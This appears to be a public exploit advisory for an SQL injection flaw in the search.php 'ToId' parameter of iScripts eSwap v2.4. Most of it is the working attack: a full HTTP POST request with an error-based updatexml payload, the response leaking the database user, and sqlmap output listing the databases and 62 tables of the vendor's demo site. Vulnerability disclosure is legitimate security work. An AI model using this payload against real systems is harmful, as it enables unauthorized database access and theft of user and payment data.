Exploit title: iScripts eSwap v2.4 - SQL injection via the search.php User Panel
Date: 23/05/2018
Exploit Author: Keyone
Vendor Homepage: https://www.iscripts.com
Software Link: https://www.iscripts.com/eswap
Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
Version: 2.4
Tested on: Windows 7
Category: Webapps
CVE:
Description
iScripts eSwap v2.4 has SQL injection via the "search.php" function parameter in User Panel.
POC : 'ToId' parameter
Request:
POST /eswap/demo/search.php HTTP/1.1
Host: www.demo.iscripts.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=csv8f9jgmjl6sh1spblmikbra0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
btnGo=Send Message&btnSubAdd=1&qyery=txtHomeSearch=1&ToId=1' and (select updatexml(1,concat(0x2b,user()),1)) and '1'='1&txtMsg=1&txtMsg11=1&txtTitle=1&txtTitle11=Mr.Response:
HTTP/1.1 200 OK
Date: Wed, 23 May 2018 01:56:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23892
...
</td>
</tr>
</table>XPATH syntax error: '+productd_dmouser@localhost'sqlmap:
[10:04:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[10:04:27] [INFO] fetching database names
[10:04:30] [INFO] used SQL query returns 2 entries
[10:04:31] [INFO] retrieved: information_schema
[10:04:31] [INFO] retrieved: productd_eswapdemo
available databases [2]:
[*] information_schema
[*] productd_eswapdemoDatabase: productd_eswapdemo
[62 tables]
+---------------------------------+
| eswap_sliders |
| eswapaffiliate |
| eswapbanners |
| eswapbanners_lang |
| eswapbatches |
| eswapcashtxn |
| eswapcategory |
| eswapcategory_lang |
| eswapchat |
| eswapclient_module_category |
| eswapcontent |
| eswapcontent_lang |
| eswapcounteroffer |
| eswapcreditpayments |
| eswapescrowrangefee |
| eswapfaq |
| eswapfaq_lang |
| eswapgallery |
| eswaphelp |
| eswaphelp_lang |
| eswaphelpcategory |
| eswaphelpcategory_lang |
| eswaplang |
| eswaplistingfee |
| eswaplookup |
| eswapmandatory |
| eswapmessages |
| eswapmetatags |
| eswapmetatags_lang |
| eswaponline |
| eswappayment |
| eswappaymentdetails |
| eswappins |
| eswapplan |
| eswapplan_lang |
| eswappointhistory |
| eswapreferrals |
| eswapsale |
| eswapsaledetails |
| eswapsaleextra |
| eswapsaleinter |
| eswapsaletemp |
| eswapsliders |
| eswapsmilies |
| eswapsuccessfee |
| eswapsuccesstransactionpayments |
| eswapsurveyquestions |
| eswapswap |
| eswapswapinter |
| eswapswapreturn |
| eswapswaptemp |
| eswapswaptxn |
| eswapswaptxn_old |
| eswaptempdata |
| eswapuser_devices |
| eswapuser_referral |
| eswapuser_sliders |
| eswapusercredits |
| eswapuserfeedback |
| eswapusers |
| eswapusersinter |
| eswapuserstemp |
+---------------------------------+